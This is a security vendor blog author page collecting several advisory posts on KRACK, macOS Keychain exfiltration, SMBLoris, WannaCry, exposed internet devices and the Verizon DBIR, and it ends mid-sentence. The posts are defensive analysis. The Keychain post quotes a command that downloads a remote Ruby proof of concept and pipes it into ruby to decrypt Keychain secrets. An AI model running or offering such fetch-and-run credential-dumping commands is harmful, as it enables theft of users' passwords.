Rapid7 Blog

boB Rudis  

AUTHOR STATS:

18

The Wi-Fi KRACK Vulnerability: What You Need to Know

Everything you need to know about the recently disclosed KRACK vulnerability affecting Wi-Fi security protocols (WPA1 and WPA2).…

Everything you need to know about the recently disclosed KRACK vulnerability affecting Wi-Fi security protocols (WPA1 and WPA2).

macOS Keychain Security : What You Need To Know

If you follow the infosec twitterverse or have been keeping an eye on macOS news sites, you’ve likely seen a tweet (with accompanying video) from Patrick Wardle (@patrickwardle) that purports to demonstrate dumping and exfiltration of something called the “keychain” without an associated privilege…

If you follow the infosec twitterverse or have been keeping an eye on macOS news sites, you’ve likely seen a tweet (with accompanying video) from Patrick Wardle (@patrickwardle) that purports to demonstrate dumping and exfiltration of something called the “keychain” without an associated privilege escalation prompt. Patrick also has a more in-depth Q&A blog post about the vulnerability. Let’s pull back a bit to provide sufficient background on why you should be concerned. What is the macOS Keychain? Without going into fine-grained detail, the macOS Keychain is a secure password management system developed by Apple. It’s been around a while (back when capital letters ruled the day in “Mac OS”) and can hold virtually anything. It’s used to store website passwords, network share credentials, passphrases for wireless networks, and encrypted disk images; you can even use it to store notes securely. A more “TL;DR” version of that is “The macOS Keychain likely has the passwords to all your email, social media, banking and other websites—as well as for local network shares and your WiFi.” Most users access Keychain data through applications, but you can use the Keychain Access GUI utility to add, change, or delete entries. Here’s a sample dialog containing credentials for a fake application called (unimaginatively enough) “forexample”: The password is not displayed by default. You need tick the “Show password:” box and a prompt will appear: Enter your system password and you’ll see the password: That’s a central part of the Keychain — you provide authority for accessing Keychain elements, even to the application that maintains the secrets for you. Apple has also provided command-line access to work with the keychain via the security command. Here’s what the listing looks like for this example: $ security find-generic-password -s forexample keychain: "/Users/me/Library/Keychains/login.keychain-db" version: 512 class: "genp" attributes: 0x00000007 <blob>="forexample" 0x00000008 <blob>=<NULL> "acct"<blob>="superseekrit" "cdat"<timedate>=0x32303137303932363230313035305A00 "20170926201050Z\000" "crtr"<uint32>=<NULL> "cusi"<sint32>=<NULL> "desc"<blob>=<NULL> "gena"<blob>=<NULL> "icmt"<blob>=<NULL> "invi"<sint32>=<NULL> "mdat"<timedate>=0x32303137303932363230313035305A00 "20170926201050Z\000" "nega"<sint32>=<NULL> "prot"<blob>=<NULL> "scrp"<sint32>=<NULL> "svce"<blob>="forexample" "type"<uint32>=<NULL> Again, the secret data is not visible. As you may have surmised, Apple also provides programmatic access to the Keychain. iOS, tvOS (etc) all use a similar keychain for storing secrets. Before we jump into the news from September 25th, 2017, let’s fire up Apple’s Time Machine and go back about four years… A (Very) Brief History of Keyjacking Rapid7’s own Erran Carey put together a proof-of-concept for “keyjacking” your Keychain a little over four years ago. If you run: curl -L https://raw.github.com/erran/keyjacker/master/keyjacker.rb | ruby You’ll get prompted to unlock the keychain: which will enable the Ruby script to decrypt all the secrets. There’s another related, older vulnerability that involved using a bit more AppleScript to trick the system into allowing unfettered access to Keychain data (that vulnerability no longer exists). So, What’s Different Now? Patrick’s video shows him running an unsigned application that was downloaded from a remote source. The usual macOS prompts come up to warn you that running said apps is a bad idea and when you enable execution a dialog come up with a button. The user in the video (presumably Patrick) presses said button and some time passes, then a file with a full, cleartext export of the entire Keychain is scrolled through. As indicated, many bad things had to happen before the secrets were revealed: the Security System Preferences had to be modified to allow you to run unsigned third-party apps on your system you had to download a program from some site or load/run it from USB (et al) drive you had to say “OK” one more time to Apple’s warning that what you are about to do is a bad idea Sure, registered/signed apps could perform the same malicious function, but that’s less likely since Apple can tie the signed app to the developer (or developer’s system) that created it. What Can I Do? It looks like this vulnerability has been around for a while. macOS Sierra and the just-released High Sierra are both vulnerable to this attack; El Capitan is also reported to be vulnerable. Since you’re likely running El Capitan or Sierra, upgrading to High Sierra isn’t going to put you further at risk. In fact, High Sierra includes security patches and additional security features that make it worth the upgrade. Bottom line: don’t let this vulnerability alone prevent you from upgrading to High Sierra if you’re on El Capitan or Sierra. However, you might want to consider a completely fresh install versus an upgrade. Why? Read on! macOS “power users” will not like the following advice, but you should consider performing a fresh install of High Sierra and starting from a completely fresh system, then migrating signed applications and data over. It’s the next bit that really hurts, though. Don’t install any unsigned third-party apps or any apps via MacPorts or Homebrew until Apple patches the vulnerability. Why? Well, there’s a chance Patrick is not the only one who found this vulnerability, and attackers may try to work up their own exploits before Apple has a chance to release a fix. In fact, they may already have (which is one reason we suggested not just doing an upgrade). And, Apple is working on a fix — Patrick responsibly informed them — but there was no time to bake it in beforethis week’s official release. Using any unsigned third-party code could put your secrets at risk. You should also be wary of running signed code that you download outside the Mac App Store. Apple’s gatekeeping is not perfect, but it’s better than the total absence of gatekeeping that comes with downloads from uncontrolled websites. Rapid7 researchers will be monitoring for other proof-of-concept (PoC) code that exploits this vulnerability (Patrick did not release his PoC code into the wild) and will be waiting and watching for Apple’s first macOS patch release — they released 10.13.1 betas to developers today — to fix this critical issue. Keep watching the Rapid7 blog for updates! Banner photo by Travis Wise • Used with permission (CC BY 2.0)

Data Mining the Undiscovered Country

Using Internet-scale Research Data to Quantify and Reduce Exposure It’s been a busy 2017 at Rapid7 Labs. Internet calamity struck swift and often, keeping us all on our toes and giving us a chance to fully test out the capabilities of our internet-scale research…

Using Internet-scale Research Data to Quantify and Reduce Exposure It’s been a busy 2017 at Rapid7 Labs. Internet calamity struck swift and often, keeping us all on our toes and giving us a chance to fully test out the capabilities of our internet-scale research platform. Let’s take a look at how two key components of Rapid7 Labs’ research platform—Project Heisenberg and Heisenberg Cloud—came together to enumerate and reduce exposure the past two quarters. (If reading isn't your thing, we'll cover this in person at today's UNITED talk.) Project Sonar Refresher Back in “the day” the internet really didn’t need an internet telemetry tool like Rapid7's Project Sonar. This: was the extent of what would eventually become the internet and it literally had a printed directory that held all the info about all the hosts and users: Fast-forward to Q1 2017 where Project Sonar helped identify a few hundred million hosts exposing one or more of 30 common TCP & UDP ports: Project Sonar is an internet reconnaissance platform. We scan the entire public IPv4 address range (except for those in our opt-out list) looking for targets, then do protocol-level decomposition scans to try to get an overall idea of “exposure” of many different protocols, including: In 2016, we began a re-evaluation and re-engineering project of Project Sonar that greatly increased the speed and capabilities of our core research gathering engine. In fact, we now perform nearly 200 “studies” per-month collecting detailed information about the current state of IPv4 hosts on the internet. (Our efforts are not random, and there’s more to a scan than just a quick port hit; there’s often quite a bit of post-processing engineering for new scans, so we don’t just call them “scans.”) Sonar has been featured in over 20 academic papers (see for yourself!) and is a core part of the foundation for many popular talks at security conferences (including 3 at BH/DC in 2017). We share all our scan data through a research partnership with the University of Michigan — https://scans.io. Keep reading to see how you can use this data on your own to help improve the security posture in your organization. Cloudy With A Chance Of Honeypots Project Sonar enables us to actively probe the internet for data, but this provides only half the data needed to understand what’s going on. Heisenberg Cloud is a sensor network of honeypots developed by Rapid7 that are hosted in every region of every major cloud provider (the following figure is an example of Heisenberg global coverage from three of the providers). Heisenberg agents can run multiple types and flavors of honeypots. From simple tripwires that enable us to enumerate activity: to more stealthy ones that are designed to blend in by mimicking real protocols and servers: All of these honeypot agents are managed through traditional, open source cloud management tools. We collect all agent-level log data using Rapid7's InsightOps tool and collect all honeypot data—including raw PCAPs—centrally on Amazon S3. We have Hesienberg nodes appearing to be everything from internet cameras to MongoDB servers and everything in between. But, we’re not just looking for malicious activity. Heisenberg also enables us to see cloud and internet service “misconfigurations”—i.e., legit, benign traffic that is being sent to a node that is no longer under the control of the sending organization but likely was at some point. We see database queries, API calls, authenticated sessions and more and this provides insight into how well organizations are (or aren’t) configuring and maintaining their internet presence. Putting It All Together We convert all our data into a column-storage format called “parquet” that enables us to use a wide array of large-scale data analysis platforms to mine the traffic. With it, we can cross-reference Sonar and Heisenberg data—along with data from feeds of malicious activity or even, say, current lists of digital coin mining bots—to get a pretty decent picture of what’s going on. This past year (to date), we’ve publicly used our platform to do everything from monitoring Mirai (et al) botnet activity to identifying and quantifying (many) vulnerable services to tracking general protocol activity and exposure before and after the Shadow Brokers releases. Privately, we’ve used the platform to develop custom feeds for our Insight platform that helps users identify, quantify and reduce exposure. Let’s look into a few especially fun and helpful cases we’ve studied: Sending Out An S.O.S. Long-time readers of the Rapid7 blog may remember a post we did on protestors hijacking internet-enabled devices that broadcasters use to get signals to radio towers. We found quite a bit of open and unprotected devices: What we didn’t tell you is that Rapid7’s Rebekah Brown worked with the National Association of Broadcasters to get the word out to vulnerable stations. Within 24 hours the scope of the issue was reduced by 50% and now only a handful (~15%) remain open and unprotected. This is an incredible “win” for the internet as exposure reduction like this is rarely seen. We used our Sonar HTTP study to look for candidate systems and then performed a targeted scan to see if each device was — in fact — vulnerable. Thanks to the aforementioned re-engineering efforts, these subsequent scans take between 30 minutes to three hours (depending on the number of targets and complexity of the protocol decomposition). That means, when we are made aware of a potential internet-wide issue, we can get active, current telemetry to help quantify the exposure and begin working with CERTs and other organizations to help reduce risk. Internet of Exposure It’d be too easy to talk about the Mirai botnet or stunt-hacking images from open cameras. Let’s revisit the exposure of a core component of our nation’s commercial backbone: petroleum. Specifically, the gas we all use to get around. We’ve talked about it before and it’s hard to believe (or perhaps not, in this day and age) such a clunky device... ...can be so exposed. We’ve shown you we can count these IoThings but we’ve taken the ATG monitoring a step further to show how careless configurations could possibly lead to exposure of important commercial information. Want to know the median number of gas tanks at any given petrol station? We’ve got an app for that: Most stations have 3-4 tanks, but some have many more. This can be sliced-and-diced by street, town, county and even country since the vast majority of devices provide this information with the tank counts. How about how much inventory currently exists across the stations? We won’t go into the economic or malicious uses of this particular data, but you can likely ponder that on your own. Despite previous attempts by researchers to identify this exposure—with the hopeful intent of raising enough awareness to get it resolved—we continue to poke at this and engage when we can to help reduce this type of exposure. Think back on this whenever your organization decides to deploy an IoT sensor network and doesn’t properly risk-assess the exposure depending on the deployment model and what information is being presented through the interface. But, these aren’t the only exposed things. We did an analysis of our Port 80 HTTP GET scans to try to identify IoT-ish devices sitting on that port and it’s a mess: You can explore all the items we found here but one worth calling out is: These are 251 buildings—yes, buildings—with their entire building management interface directly exposed to the internet, many without authentication and not even trying to be “sneaky” and use a different port than port 80. It’s vital that you scan your own perimeter for this type of exposure (not just building management systems, of course) since it’s far too easy to have something slip on to the internet than one would expect. Wiping Away The Tears Rapid7 was quick to bring hype-free information and help for the WannaCry “digital hurricane” this past year. We’ve migrated our WannaCry efforts over to focused reconnaissance of related internet activity post-Shadow Brokers releases. Since WannaCry, we’ve seen a major uptick in researchers and malicious users looking for SMB hosts (we’ve seen more than that but you can read our 2017 Q2 Threat Report for more details). As we work to understand what attackers are doing, we are developing different types of honeypots to enable us to analyze—and, perhaps even predict—their intentions. We’ve done even more than this, but hopefully you get an idea of the depth and breadth of analyses that our research platform enables. Take Our Data...Please! We provide some great views of our data via our blog and in many reports: But, YOU can make use of our data to help your organization today. Sure, Sonar data is available via Metasploit (Pro) via the Sonar C, but you can do something as simple as: $ curl -o smb.csv.gz\ https://scans.io/data/rapid7/sonar.tcp/2017-08-16-1502859601-tcp_smb_445.csv.gz $ gzcat smb.csv.gz | cut -d, -f4,4 | grep MY_COMPANY_IP_ADDRESSES to see if you’re in one of the study results. Some ones you really don’t want to show up in include SMB, RDP, Docker, MySQL, MS SQL, MongoDB. If you’re there, it’s time to triage your perimeter and work on improving deployment practices. You can also use other Rapid7 open source tools (like dap) and tools we contribute to (such as the ZMap ecosystem) to enrich the data and get a better picture of exposure, focusing specifically on your organization and threats to you. Fin We’ve got more in store for the rest of the year, so keep an eye (or RSS feed slurper) on the Rapid7 blog as we provide more information on exposure. You can get more information on our studies and suggest new ones via research@rapid7.com.

SMBLoris: What You Need To Know

What's Up?Astute readers may have been following the recent news around "SMBLoris" — a proof-of-concept exploit that takes advantage of a vulnerability in the implementation of SMB services on both Windows and Linux, enabling attackers to "kill you softly" with a clever, low-profile application-level…

What's Up?Astute readers may have been following the recent news around "SMBLoris" — a proof-of-concept exploit that takes advantage of a vulnerability in the implementation of SMB services on both Windows and Linux, enabling attackers to "kill you softly" with a clever, low-profile application-level denial of service (DoS). This vulnerability impacts all versions of Windows and Samba (the Linux software that provides SMB services on that platform) and Microsoft has stated that is has no current intention to provide a fix for the issue.Researchers Sean Dillon (Twitter: @zerosum0x0) and Jenna Magius (Twitter: @jennamagius) found the original vulnerability in June (2017) and noted that it was an apparent bug in SMBv1 (you'll remember that particular string of letters from both WannaCry and "NotPetya" outbreaks this year), and Jenna Magius was one of the researchers who more recently noted that all Windows systems — including Windows 10 — exposing port 445 are vulnerable (i.e. disabling SMBv1 won't stop attacks).This means that the current situation is that all Windows systems exposing port 445 and the majority of Linux systems exposing port 445 are vulnerable to this application-level denial of service attack. If the attack is successful, the system being attacked will need to be rebooted and will still be vulnerable. Researchers have noted that this vulnerability is similar to one from 2009 — Slowloris — that impacted different types of systems with the same technique. It appears, however, that SMBLoris can have a much faster negative impact even on Windows systems with robust hardware configurations.Is The World Ending?Yes…in approximately 7.5 billion years when our Sun is estimated to turn into a dwarf star.However, here are the facts about this vulnerability:It is not, itself, "wormable" as seen with previous SMB-related attacks this year.It is not "ransomware".There is currently no indication of active exploitation of it (we and other researchers are monitoring for this and will provide additional communications & guidance if we discover widespread SMBLoris probes or attacks).It is not any more destructive to a single system than what might happen if you accidentally turned off said system without shutting it down properly.If you have mobile endpoints (i.e. laptops) that connect to diverse networks or SMB servers exposing port 445 to the internet, then those systems are vulnerable to this SMBLoris exploit and can easily be (temporarily) taken down by attackers.Your internal systems are also vulnerable to this attack as most organizations do not implement granular controls over port 445 system-to-system communications. This means that an attacker who compromises a system within your network can launch SMBLoris attacks against any assets exposing port 445.So, while the world is generally safe, there is room for reasoned caution.What Can We Do?If you own one or more of the ~4 million internet endpoints exposing this vulnerable protocol on port 445 (as noted in our 2017 Q2 Threat Report) then you should take steps to remove those systems from the internet (it's never a good idea to expose this service directly to the internet anyway).If you have an active, mobile user base, then those devices should be configured to block access to port 445 when not on the corporate network. Even then, it's a good idea to have well-crafted host firewall rules to restrict access on this port.You should also be monitoring both your operations logs/alerts and help desk tickets for unusual reports of random system crashes and reboots and handling them through your standard incident response processes.What Might Attackers Do With SMBLoris?Denial of service and distributed denial of service (DDoS) attacks are generally used to disable services for:"fun"/retaliation/ideologyfinancial gain (e.g. extortion), anddistraction (i.e. keeping operations teams and incident responders busy to cover the tracks for other malicious behaviour)The CVE Details site shows over 60,000 application/operating system DoS vulnerabilities spread across hundreds of vendor products. It is highly likely that you have many of these other DoS vulnerabilities present on both your internet-facing systems and intranet-systems. In other words, attackers have a plethora of targets to choose from when deciding to use application- or OS-level DoS attacks against an organization.What makes SMBLoris a bit more insidious and a potential go-to vulnerability for attackers is that it makes it easy to perform nigh-guaranteed widespread DDoS attacks against homogeneous networks exposing port 445. So, while you should not be panicking, you should be working to understand your exposure, creating and deploying configurations to mitigate said exposure, and performing the monitoring outlined above.If you do not have a threat exercise scenario for application-level DDoS attacks or do not have an incident response plan for such an attack, now would be a great time to work on that. You can use this run book by the Financial and Banking Information Infrastructure Committee (FBIIC) as a starting point or reference.As stated earlier, we are on the lookout for adversarial activity surrounding SMBLoris, and will update the community if and when we have more information.(Banner image by Jonas Eklundh)

(Server) Ransomware in the Cisco 2017 Midyear Cybersecurity Report: Rapid7's Readout

It's summer in the northern hemisphere and many folks are working their way through carefully crafted reading lists, rounding out each evening exploring fictional lands or investigating engrossing biographies. I'm hoping that by the end of this post, you'll be adding another item to your…

It's summer in the northern hemisphere and many folks are working their way through carefully crafted reading lists, rounding out each evening exploring fictional lands or investigating engrossing biographies. I'm hoping that by the end of this post, you'll be adding another item to your "must read" list — a tome whose pages are bursting with exploits carried out by crafty, international adversaries and stories of modern day sleuths on the hunt for those who would seek their fortunes by preying on the innocent and ill-prepared. "What work is this?!" you ask (no doubt with eager anticipation). Why, it's none other than the Cisco 2017 Midyear Cybersecurity Report (MCR)! This year, Rapid7—along with nine other organizations—contributed content for Cisco's mid-year threat landscape review, and it truly is a treasure trove of information with data, intelligence and guidance from a wide range of focus areas across the many disciplines of cybersecurity. Avid readers of the R7 blog likely remember our foray into "DevOps" server-ransomware earlier this year. We've been using Project Sonar to monitor MongoDB, CouchDB, Elasticsearch and Docker—what we're calling "DevOps" servers—since January, and we've provided a deep-dive into the state of these services in the Cisco 2017 MCR. You should read the "DevOps" section within the context of the entire report as other sections provide both reinforcement and additional adversary context to our findings, but we wanted to show a small extension of the MongoDB server status here since we've performed a few more scans since we provided the research results in the MCR: There are two main takeaways from both the current state of MongoDB (and the other "DevOps" servers). First: Good show! While there are still thousands of MongoDB (and CouchDB, and Elasticsearch, and Docker, etc) exposed to the internet without authentication, the numbers are generally decreasing or holding steady (discrepancies per-scan are expected since mining the internet for data is notoriousily fraught with technical peril) and it seems attackers have realized that the remaining instances out there are likely non-production, forgotten or abandoned systems. It would be great if the owners of these systems yanked them off of the internet, but the issue appears to have been (at least, temporarily) abated. Second: Be vigilant! Attackers have had ample opportunity to fine tune their "DevOps" discovery kits as well as their ransom/destruction kits. We've all witnessed just how easy it is for our adversaries to gain an internal foothold when they believe it will be beneficial (ref: WannaCry and Petya-not-Petya). It truly is only a matter of time before the techniques they've perfected on the open internet make their way into our gilded internal network cages. It would be very prudent to take this summer lull to scan for open or weak-credentialed "DevOps" servers in your own environments and make sure they're more properly secured before you find yourself standing feeding bills into a Bitcoin ATM when you should be basking in the sun on the beach. The Cisco 2017 MCR is absolute "must add" to the reading lists of IT and cybersecurity professionals and we hope you take some time to digest it out over the coming days/weeks.

Wanna Decryptor (WNCRY) Ransomware Explained

Mark the date: May 12, 2017. This is the day the “ransomworm” dubbed “WannaCry” / “Wannacrypt” burst — literally — onto the scene with one of the initial targets being the British National Health Service. According to The Guardian: the “unprecedented attack… affected 12 countries and at least…

Mark the date: May 12, 2017. This is the day the “ransomworm” dubbed “WannaCry” / “Wannacrypt” burst — literally — onto the scene with one of the initial targets being the British National Health Service. According to The Guardian: the “unprecedented attack… affected 12 countries and at least 16 NHS trusts in the UK, compromising IT systems that underpin patient safety. Staff across the NHS were locked out of their computers and trusts had to divert emergency patients.” A larger estimate by various cybersecurity firms indicates that over 70 countries have been impacted in some way by the WannaCry worm. As of this post's creation time, a group with the Twitter handle @0xSpamTech has claimed responsibility for instigating the attack but this has not yet been confirmed. What is involved in the attack, what weakness(es) and systems does it exploit, and what can you do to prevent or recover from this attack? The following sections will dive into the details and provide guidance on how to mitigate the impact from future attacks. What is "Ransomware"? Ransomware "malicious software which covertly encrypts your files – preventing you from accessing them – then demands payment for their safe recovery. Like most tactics employed in cyberattacks, ransomware attacks can occur after      clicking on a phishing link or visiting a compromised website.” (https://www.rapid7.com/solutions/ransomware/) However, WannaCry ransomware deviates from the traditional ransomware definition by including a component that is able to find vulnerable systems on a local network and spread that way as well. This type of malicious software behavior is called a “worm” and the use of such capabilities dates back to 1988 when the Morris Worm spread across the internet (albeit a much smaller neighborhood at the time). Because WannaCry combines two extremely destructive capabilities, it has been far more disruptive and destructive than previous cases of ransomware that we've seen over the past 18-24 months. While the attackers are seeking ransom — you can track payments to their Bitcoin addresses: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 here: https://blockchain.info/address/ — there have been reports of this also corrupting drives, adding a destructive component as well as a ransom-recovery component to the attack. What Systems Are Impacted? WannaCry only targets Microsoft Windows systems and is known to impact the following versions: Microsoft Windows Vista SP2 Windows Server 2008 SP2 and R2 SP1 Windows 7 Windows 8.1 Windows RT 8.1 Windows Server 2012 and R2 Windows 10 Windows Server 2016 Windows XP However, all versions of Windows are likely vulnerable and on May 13, 2017 Microsoft issued a notification that included links to patches for all impacted Windows operating systems — including Windows XP. As noted, Windows XP is impacted as well. That version of Windows still occupies a 7-10% share of usage (as measured by NetMarketshare): and, this usage figure likely does not include endpoint counts from countries like China, who have significant use of “aftermarket” versions of Windows XP and other Windows systems, making them unpatchable. The “worm” component takes advantage of a Remote Code Execution (RCE) vulnerability that is present in the part of Windows that makes it possible to share files over the network (known as “Server Message Block” or SMB). Microsoft released a patch -MS17-010 - for this vulnerability on March 14th, 2017 prior to the release of U.S. National Security Agency (NSA) tools (EternalBlue / DoublePulsar) by a group known as the the Shadow Brokers. Rapid7's Threat Intelligence Lead, Rebekah Brown, wrote a breakdown of this release in a blog post in April. Vulnerability detection tools, such as Rapid7's Metasploit, have had detection capabilities for this weakness for a while, with the most recent Metasploit module being updated on April 30, 2017. This ransomworm can be spread by someone being on public Wi-Fi or an infected firm's “guest” WiFi and then taking an infected-but-not-fully-encrypted system to another network. WannaCry is likely being spread, still, by both the traditional phishing vector as well as this network worm vector. What Can You Do? Ensure that all systems have been patched against MS17-010 vulnerabilities. Identify any internet-facing systems that have not been patched and remediate as soon as possible. Employ network and host-based firewalls to block TCP/445 traffic from untrusted systems. If possible, block 445 inbound to all internet-facing Windows systems. Ensure critical systems and files have up-to-date backups. Backups are the only full mitigation against data loss due to ransomware. NOTE: The Rapid7 Managed Detection & Response (MDR) SOC has developed detection indicators of compromise (IOCs) for this campaign, however we are only alerted once the malware executes on a compromised system. This is not a mitigation step. UPDATE - May 15, 2017: For information on how to scan for, and remediate, MS17-010 with Nexpose and InsightVM, please read this blog. A Potentially Broader Impact We perform regular SMB scans as a part of Project Sonar and detected over 1.8 million devices responding to full SMB connection in our May 3, 2017 scan: Some percentage of these systems may be Linux/UNIX servers emulating the SMB protocol but it's likely that a large portion are Windows systems. Leaving SMB (via TCP port 445) open to the internet is also a sign that these systems are not well maintained, and are also susceptible to attack. Rapid7's Heisenberg Cloud — a system of honeypots spread throughout the internet — has seen a recent spike in probes for systems on port 445 as well: Living With Ransomware Ransomware has proven to be an attractive and lucrative vector for cybercriminals. As stated previously, backups, along with the ability to quickly re-provision/image an impacted system, are your only real defenses. Rapid7 has additional resources available for you to learn more about dealing with ransomware: Understanding Ransomware: https://www.rapid7.com/resources/understanding-ransomware/ Ransomware FAQ: /2016/03/22/ransomware-faq-av oiding-the-latest-trend-in-malware If you'd like more information on this particular ransomworm as seen by Project Sonar or Heisenberg Cloud, please contact research [at] rapid7 [dot] com. Many thanks to the many contributors across Rapid7 who provided vital information and content for this post. For more information and resources on WannaCry and ransomware, please visit this page.

2017 Verizon Data Breach Report (DBIR): Key Takeaways

The much-anticipated, tenth-anniversary edition of the Verizon DBIR has been released (http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/), once again providing a data-driven snapshot into what topped the cybercrime charts in 2016. There are just under seventy-five information-rich pages to go through, with topics ranging…

The much-anticipated, tenth-anniversary edition of the Verizon DBIR has been released (http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/), once again providing a data-driven snapshot into what topped the cybercrime charts in 2016. There are just under seventy-five information-rich pages to go through, with topics ranging from distributed denial-of-service (DDoS) to ransomware, prompting us to spin a reprise edition of last year's DBIR field guide (/2016/04/29/the-2016-verizon- data-breach-investigations-report-the-defenders-perspective)). Before we bust out this year's breach-ography, let's set a bit of context. The Verizon DBIR is digested by a diverse community, but the lessons found within are generally aimed at defenders in organizations who are faced with the unenviable task of detecting and deterring the daily onslaught of attacks and attackers. This post is also aimed at that audience. As you go through the Verizon DBIR, there should be three guiding principles at work: How do I use this information to improve my organization's threat response time? How do I use this information to improve my resistance strength (http://www.fairinstitute.org/blog/threat-capability-and-resistance-strength-a-we ight-on-a-rope)? How do I use this information to increase the time it takes attackers to accomplish their goals? Time to fire up the jukebox and see what's inside. The Detection-Deficit is Dead…Long Live the Defender's Differential! The first chart I always went to in the DBIR was the Detection-Deficit chart. Said chart “compared the percentage of breaches where the time-to-compromise was days or less against the percentage of breaches where the time- to-discovery was days or less.” (VZDBIR, pg 8). It's also no longer an artifact in the Verizon DBIR. The Verizon Security Research team provided many good reasons for not including the chart in the report, and also noted several caveats about the timings that you should take time to consider. But, you still need to be tracking similar metrics in your own organization to see if things are getting better or worse (things rarely hold steady in infosec land).  We've taken a cue from the DBIR and used their data to give you two new metrics to track: the “Exfiltration-Compromise Differential” and the “Containment-Discovery Differential”. The former chart shows a band created by comparing the percentage of breaches where exfiltration (you can substitute or add-in other accomplished attacker goals) was in “days or less” (in other words, less than seven days) to those when initial compromise was “days or less”. This band should be empty (all attacker events took days or longer) or as tiny as possible. The latter does the same to compare the defender's ability to detect and contain attacker activity. That band needs to be as YUGE as you can make it (aligned to your organization's risk and defense spending appetites). As noted in the Verizon DBIR, things aren't getting much better (or worse) when looked at in aggregate, but I'm hopeful that organizations can make progress in these areas as tools, education, techniques and processes continue to improve. Some other key takeaways in the “Breach Trends” section include: The balance between External and Internal actors has ebbed-and flowed at about the same pace for the past 7 years, meaning Figure 2 does not validate the ever-present crusade by your Internal Audit department to focus solely on defending against rogue sysadmins. There is a cautionary tale here, though, in that many of the attacks marked as “internal” were actually committed by external attackers who used legit credentials to impersonate internal users. We have finally reached the Threat Action Trifecta stage with Social, Malware and Hacking reigning supreme (and will likely do so for some time to come). Financial gain and stealing secrets remain primary motives (and defending against those who seek your secrets may become job #1 over the coming years if Figure 3 continues the trend). Team DBIR also provided a handy punch-card for you in Figure 9: It's your “at-a-glance” key to the 2016 chart-toppers by industry. Keep it handy as you sit in your post-DBIR-launch roadmap adjustment meetings (you do have those, right?). The Secret Life of Enterprise Vulnerability Management (Guest starring IoT) Verizon has many partners who provide scads of vulnerability data, and the team took a very interesting look at  patching in the intro section preceding the individual industry dives. Verizon gives a solid, technical explanation of this chart, so we'll focus on how you should benchmark your own org against it. Find your industry (NAICS codes are here: https://www.census.gov/eos/www/naics/ but you can also Google™ “COMPANY_NAME NAICS” and usually get a quick result) on the right then hit up your vulnerability and patch management dashboards to see if you meet or beat expectations. If you're a college, do you patch more than 12% of vulns in 12 weeks-time? If you're in a hospital, do you meet the 77% bar? The chart is based on real data from many organizations. You may have some cognitive dissonance reading it because we constantly hear how awesome, well-resourced financial institutions are at IT & security and the converse for industries such as Healthcare. One way to validate these findings is to start tracking this data internally, then getting your ISAC partners (you are aligned with one — or more — information sharing and analysis centers, right?) to do the same and compare notes a few times a year. You also need to define your own targets and use your hit/miss ratio as a catalyst for process improvement (or funding for better tooling). But wait…there's more! Keep one finger on page 13 and then flip to Appendix B to get even more information on vulnerability management, including this chart > Network ops folks patching on 90-day cycles shouldn't really surprise folks - we need to keep those bits and bytes flowing and error-free high-availability switchover capability is expensive - but take a look at the yellow-ish line. First, do you even track IoT (Internet of Things, i.e. embedded) patching? And, if you do — or, when you start to after reading this — will you strive to do better than the “take 100 days to not even get half the known vulns patched”? IoT is a blind-spot in many (most) organizations and this chart is a great reminder that you need to: care about inventory/locate, and track IoT in your environment. Industrial Development Unfortunately, digesting the various Industry sections of the Data Breach Investigations Report is an exercise that you must — dear, reader — undertake on your own, but they are a good resource to have for planning or security architecture development session. Find your industry (see the previous section in this post), note the breach frequency (they'll likely have fixed the bug in the Accommodation section by the time our blog post drops), top patterns, actor information and compromise targets and compare your 2016 to the overall industry 2016. Note the differences (or similarities) and adjust accordingly. The DBIR team provides unique details and content in each industry section to help you focus on the differentials (the unique incident characteristics that made one industry different from each other). As you go through each, do not skip over the caveats. The authors of the report spend a great deal of time sifting through details and will often close out a section with important information that may change your perspective on a given area, such as this closing caveat in the Retail section: “This year we do not have any large retailers in the Point of Sale Intrusions pattern, which is hopefully an indicator of improvements and lessons learned. We are interested in finding out if smaller retailers also learned this lesson, or if single small breaches just aren't making it into our dataset.” The Last Waltz: Dancing Through Incident Classification Patterns We'll close with an overview of the bread-and-butter (or, perhaps, avocado toast?) of the DBIR: the incident classification patterns. Figures 33 & 34 provides the necessary contextual overview: Breaches hurt, but incidents happen with more regularity, so you need to plan for both. First, compare overall prevalence for each category to what your own org saw in 2016 so you understand your own, unique view. Next, make these sections actionable. One of the best ways to get the most out of the data in each of the Patterns sections is to take one or two key details from each that matter to your industry (they align the top ones in each category) and design either tabletop or actual red-team exercise scenarios that your org can run through. For example, design a scenario where attackers have obtained a recent credential dump and have targeted your employee HR records (yes, I took the easy one from Figure 52, page 58).  MITRE has a decent “Cyber Exercise Playbook” (https://www.mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise -playbook.pdf)) you can riff off of if you don't have one of your own to start with. Coda This is the first year Rapid7 has been a part of the DBIR corpus and we want to end with a shout-out to the entire DBIR team for taking the time to walk through our incident/breach-data contributions with us and look forward to contributing more —and more diverse — data in reports to come.

ON-AIR: Broadcasting Insecurity

Note: Rebekah Brown was the astute catalyst for the search for insecure broadcast equipment and the major contributor to this post. Reports have surfaced recently of local radio station broadcasts being hijacked and used to play anti-Donald Trump songs (https://www.rt.com/viral/375935-trump-song-hacked-radio/…

Note: Rebekah Brown was the astute catalyst for the search for insecure broadcast equipment and the major contributor to this post. Reports have surfaced recently of local radio station broadcasts being hijacked and used to play anti-Donald Trump songs (https://www.rt.com/viral/375935-trump-song-hacked-radio/). The devices that were taken over are Barix Exstream systems, though there are several other brands of broadcasters, including Pkyo, that are configured and setup the same way as these devices and would also be vulnerable to this type of hijacking. Devices by these manufacturers work in pairs. In the most basic operating mode, one encodes and transmits a stream over an internal network or over the internet and the other receives it and blasts it to speakers or to a transmitter. Because they work in tandem, if you can gain access to one of these devices, you have information about the other one, including the IP address and port(s) it's listening on. After seeing the story, we were curious about the extent of the exposure. The View from the Control Room We reviewed the January 31, 2017 port 80 scan data set from Rapid7's Project Sonar to try to identify Barix Instreamer/Exstreamer devices and Pyko devices based on some key string markers we identified from a cadre of PDF manuals. We found over a thousand of them listening on port 80 and accessible without authentication. They seem to be somewhat popular on almost every continent and are especially popular here in the United States. Many of these devices have their administration interfaces on something besides port 80, so this is likely just a sample of the scope of the problem. Because they operate in pairs, once you gain access to one device, you can learn about their counterparts directly from the administration screens: It's trivial to reconfigure either the source or destination points to send or receive different streams and 